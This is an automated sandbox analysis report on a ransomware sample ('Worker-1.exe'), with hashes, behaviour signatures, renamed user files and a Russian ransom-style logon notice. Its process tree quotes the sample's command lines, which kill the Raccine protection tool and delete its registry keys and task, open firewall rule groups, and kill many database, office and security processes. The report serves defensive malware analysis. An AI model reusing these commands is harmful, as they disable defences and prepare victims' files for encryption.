2c6802679ce8ac5ed90bd25d25805e284c7dd5269f7805c68cc5fd965a0adc21

Resubmissions

04-11-2021 15:34

211104-sz21psghe5 10

29-10-2021 15:29

211029-swzq6saccp 10

29-10-2021 07:07

211029-hxtanshefl 8

Analysis

max time kernel
116s
max time network
131s
platform
windows10_x64
resource
win10-en-20210920
submitted
04-11-2021 15:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Worker-1.exe
Size

385KB
MD5

7677a593678d9c4552578fab18a27384
SHA1

5c3b0d278df728c67122ac3ab7184c3f9ebfaa4f
SHA256

2c6802679ce8ac5ed90bd25d25805e284c7dd5269f7805c68cc5fd965a0adc21
SHA512

8bbce3eefabf7e7d900ba3fa0a42ca3be265425c8b5675e27839a1397d1653ae54e3abbd8a6b0b8ff7ab44d130afb1a81d04d57af42dc45e7227d676a335e082

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

description	flow	ioc
HTTP URL	34	http://live.sysinternals.com/PsExec.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 26 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\InvokeUndo.crw => C:\Users\Admin\Pictures\InvokeUndo.crw.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\NewHide.crw => C:\Users\Admin\Pictures\NewHide.crw.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\PingFind.tif => C:\Users\Admin\Pictures\PingFind.tif.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\ProtectLimit.raw => C:\Users\Admin\Pictures\ProtectLimit.raw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\EnableConfirm.tiff	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\EnableConfirm.tiff => C:\Users\Admin\Pictures\EnableConfirm.tiff.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\InitializeLimit.raw => C:\Users\Admin\Pictures\InitializeLimit.raw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeLimit.raw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\InvokeUndo.crw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\NewHide.crw.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\SaveDeny.png => C:\Users\Admin\Pictures\SaveDeny.png.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\SaveDeny.png.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\ClearSuspend.raw => C:\Users\Admin\Pictures\ClearSuspend.raw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\EnableConfirm.tiff.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\ExpandSave.crw => C:\Users\Admin\Pictures\ExpandSave.crw.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\GrantJoin.png => C:\Users\Admin\Pictures\GrantJoin.png.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\UnprotectUpdate.raw => C:\Users\Admin\Pictures\UnprotectUpdate.raw.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\ExportExpand.tiff => C:\Users\Admin\Pictures\ExportExpand.tiff.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\ProtectLimit.raw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\UnprotectUpdate.raw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\GrantJoin.png.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\PingFind.tif.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\ClearSuspend.raw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\ExpandSave.crw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\ExportExpand.tiff	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\ExportExpand.tiff.v4cnyy	Worker-1.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	Worker-1.exe
File opened (read-only)	\??\V:	Worker-1.exe
File opened (read-only)	\??\B:	Worker-1.exe
File opened (read-only)	\??\W:	Worker-1.exe
File opened (read-only)	\??\S:	Worker-1.exe
File opened (read-only)	\??\F:	Worker-1.exe
File opened (read-only)	\??\G:	Worker-1.exe
File opened (read-only)	\??\E:	Worker-1.exe
File opened (read-only)	\??\N:	Worker-1.exe
File opened (read-only)	\??\M:	Worker-1.exe
File opened (read-only)	\??\A:	Worker-1.exe
File opened (read-only)	\??\K:	Worker-1.exe
File opened (read-only)	\??\T:	Worker-1.exe
File opened (read-only)	\??\Y:	Worker-1.exe
File opened (read-only)	\??\U:	Worker-1.exe
File opened (read-only)	\??\P:	Worker-1.exe
File opened (read-only)	\??\H:	Worker-1.exe
File opened (read-only)	\??\L:	Worker-1.exe
File opened (read-only)	\??\Z:	Worker-1.exe
File opened (read-only)	\??\X:	Worker-1.exe
File opened (read-only)	\??\Q:	Worker-1.exe
File opened (read-only)	\??\R:	Worker-1.exe
File opened (read-only)	\??\I:	Worker-1.exe
File opened (read-only)	\??\O:	Worker-1.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	Worker-1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	Worker-1.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

pid	Process
1952	taskkill.exe
2136	taskkill.exe
2844	taskkill.exe
708	taskkill.exe
3012	taskkill.exe
1404	taskkill.exe
2736	taskkill.exe
2156	taskkill.exe
3960	taskkill.exe
3188	taskkill.exe
2844	taskkill.exe
3544	taskkill.exe
2396	taskkill.exe
976	taskkill.exe
3920	taskkill.exe
3656	taskkill.exe
1308	taskkill.exe
68	taskkill.exe
1716	taskkill.exe
3044	taskkill.exe
3180	taskkill.exe
3172	taskkill.exe
3604	taskkill.exe
3812	taskkill.exe
3508	taskkill.exe
1164	taskkill.exe
1164	taskkill.exe
3892	taskkill.exe
1324	taskkill.exe
512	taskkill.exe
368	taskkill.exe
772	taskkill.exe
2448	taskkill.exe
3184	taskkill.exe
1900	taskkill.exe
1040	taskkill.exe
2368	taskkill.exe
372	taskkill.exe
512	taskkill.exe
3068	taskkill.exe
3744	taskkill.exe
4064	taskkill.exe
1356	taskkill.exe
1424	taskkill.exe
604	taskkill.exe
2384	taskkill.exe
3332	taskkill.exe
3904	taskkill.exe
3764	taskkill.exe
1936	taskkill.exe
2764	taskkill.exe
2200	taskkill.exe
1192	taskkill.exe
2948	taskkill.exe
2252	taskkill.exe
3096	taskkill.exe
1208	taskkill.exe
1984	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3292	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1432	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe
2768	Worker-1.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

description	pid	Process
Token: SeDebugPrivilege	2768	Worker-1.exe
Token: SeDebugPrivilege	2768	Worker-1.exe
Token: SeDebugPrivilege	512	taskkill.exe
Token: SeDebugPrivilege	1936	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	2844	taskkill.exe
Token: SeDebugPrivilege	3812	taskkill.exe
Token: SeDebugPrivilege	2448	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	3184	taskkill.exe
Token: SeDebugPrivilege	2764	Conhost.exe
Token: SeDebugPrivilege	3744	taskkill.exe
Token: SeDebugPrivilege	3508	taskkill.exe
Token: SeDebugPrivilege	3180	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	3012	taskkill.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	1424	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeDebugPrivilege	3960	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	1404	taskkill.exe
Token: SeDebugPrivilege	3172	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	2136	taskkill.exe
Token: SeDebugPrivilege	368	taskkill.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	2844	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	2948	taskkill.exe
Token: SeDebugPrivilege	604	taskkill.exe
Token: SeDebugPrivilege	2384	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	372	taskkill.exe
Token: SeDebugPrivilege	3332	taskkill.exe
Token: SeDebugPrivilege	3920	taskkill.exe
Token: SeDebugPrivilege	1356	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe
Token: SeDebugPrivilege	2396	taskkill.exe
Token: SeDebugPrivilege	68	taskkill.exe
Token: SeDebugPrivilege	3764	taskkill.exe
Token: SeDebugPrivilege	708	taskkill.exe
Token: SeDebugPrivilege	772	taskkill.exe
Token: SeDebugPrivilege	976	taskkill.exe
Token: SeDebugPrivilege	512	taskkill.exe
Token: SeDebugPrivilege	3068	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	3604	taskkill.exe
Token: SeDebugPrivilege	3656	taskkill.exe
Token: SeDebugPrivilege	3096	taskkill.exe
Token: SeDebugPrivilege	656	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2768	Worker-1.exe
2768	Worker-1.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
2768	Worker-1.exe
2768	Worker-1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2768 wrote to memory of 512	2768	Worker-1.exe	70
PID 2768 wrote to memory of 512	2768	Worker-1.exe	70
PID 2768 wrote to memory of 512	2768	Worker-1.exe	70
PID 2768 wrote to memory of 976	2768	Worker-1.exe	72
PID 2768 wrote to memory of 976	2768	Worker-1.exe	72
PID 2768 wrote to memory of 976	2768	Worker-1.exe	72
PID 2768 wrote to memory of 3292	2768	Worker-1.exe	74
PID 2768 wrote to memory of 3292	2768	Worker-1.exe	74
PID 2768 wrote to memory of 3292	2768	Worker-1.exe	74
PID 2768 wrote to memory of 2948	2768	Worker-1.exe	76
PID 2768 wrote to memory of 2948	2768	Worker-1.exe	76
PID 2768 wrote to memory of 2948	2768	Worker-1.exe	76
PID 2768 wrote to memory of 1568	2768	Worker-1.exe	78
PID 2768 wrote to memory of 1568	2768	Worker-1.exe	78
PID 2768 wrote to memory of 1568	2768	Worker-1.exe	78
PID 2768 wrote to memory of 1352	2768	Worker-1.exe	81
PID 2768 wrote to memory of 1352	2768	Worker-1.exe	81
PID 2768 wrote to memory of 1352	2768	Worker-1.exe	81
PID 2768 wrote to memory of 3748	2768	Worker-1.exe	80
PID 2768 wrote to memory of 3748	2768	Worker-1.exe	80
PID 2768 wrote to memory of 3748	2768	Worker-1.exe	80
PID 2768 wrote to memory of 604	2768	Worker-1.exe	82
PID 2768 wrote to memory of 604	2768	Worker-1.exe	82
PID 2768 wrote to memory of 604	2768	Worker-1.exe	82
PID 2768 wrote to memory of 3736	2768	Worker-1.exe	86
PID 2768 wrote to memory of 3736	2768	Worker-1.exe	86
PID 2768 wrote to memory of 3736	2768	Worker-1.exe	86
PID 2768 wrote to memory of 1180	2768	Worker-1.exe	91
PID 2768 wrote to memory of 1180	2768	Worker-1.exe	91
PID 2768 wrote to memory of 1180	2768	Worker-1.exe	91
PID 2768 wrote to memory of 908	2768	Worker-1.exe	88
PID 2768 wrote to memory of 908	2768	Worker-1.exe	88
PID 2768 wrote to memory of 908	2768	Worker-1.exe	88
PID 2768 wrote to memory of 1384	2768	Worker-1.exe	92
PID 2768 wrote to memory of 1384	2768	Worker-1.exe	92
PID 2768 wrote to memory of 1384	2768	Worker-1.exe	92
PID 2768 wrote to memory of 2324	2768	Worker-1.exe	93
PID 2768 wrote to memory of 2324	2768	Worker-1.exe	93
PID 2768 wrote to memory of 2324	2768	Worker-1.exe	93
PID 2768 wrote to memory of 1936	2768	Worker-1.exe	96
PID 2768 wrote to memory of 1936	2768	Worker-1.exe	96
PID 2768 wrote to memory of 1936	2768	Worker-1.exe	96
PID 2768 wrote to memory of 3044	2768	Worker-1.exe	98
PID 2768 wrote to memory of 3044	2768	Worker-1.exe	98
PID 2768 wrote to memory of 3044	2768	Worker-1.exe	98
PID 2768 wrote to memory of 1952	2768	Worker-1.exe	99
PID 2768 wrote to memory of 1952	2768	Worker-1.exe	99
PID 2768 wrote to memory of 1952	2768	Worker-1.exe	99
PID 2768 wrote to memory of 2844	2768	Worker-1.exe	158
PID 2768 wrote to memory of 2844	2768	Worker-1.exe	158
PID 2768 wrote to memory of 2844	2768	Worker-1.exe	158
PID 2768 wrote to memory of 3812	2768	Worker-1.exe	104
PID 2768 wrote to memory of 3812	2768	Worker-1.exe	104
PID 2768 wrote to memory of 3812	2768	Worker-1.exe	104
PID 2768 wrote to memory of 2448	2768	Worker-1.exe	106
PID 2768 wrote to memory of 2448	2768	Worker-1.exe	106
PID 2768 wrote to memory of 2448	2768	Worker-1.exe	106
PID 2768 wrote to memory of 3544	2768	Worker-1.exe	108
PID 2768 wrote to memory of 3544	2768	Worker-1.exe	108
PID 2768 wrote to memory of 3544	2768	Worker-1.exe	108
PID 2768 wrote to memory of 3184	2768	Worker-1.exe	110
PID 2768 wrote to memory of 3184	2768	Worker-1.exe	110
PID 2768 wrote to memory of 3184	2768	Worker-1.exe	110
PID 2768 wrote to memory of 2764	2768	Worker-1.exe	161

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	Worker-1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	Worker-1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	Worker-1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	Worker-1.exe

C:\Users\Admin\AppData\Local\Temp\Worker-1.exe
"C:\Users\Admin\AppData\Local\Temp\Worker-1.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2768
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:512
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:976
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3292
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:2948
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:1568
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:3748
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1352
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:604
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:3736
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:908
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1180
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1384
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:2324
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1936
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1952
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:2844
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3812
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2448
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3544
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3184
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:2764
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3744
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3180
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3508
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1164
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1208
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1424
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2252
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1900
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1040
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3172
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1404
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3188
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:2204
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4064
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2136
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:368
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2736
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2844
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2948
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:604
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2384
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3892
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:3248
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2368
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3332
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:372
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3920
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1356
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3904
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2396
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:68
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3764
